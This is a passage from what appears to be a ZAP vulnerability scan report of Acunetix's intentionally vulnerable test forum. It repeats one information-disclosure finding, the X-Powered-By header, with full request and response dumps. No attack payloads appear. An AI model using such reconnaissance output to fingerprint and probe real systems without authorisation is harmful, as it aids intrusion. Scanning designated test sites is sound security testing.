cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a 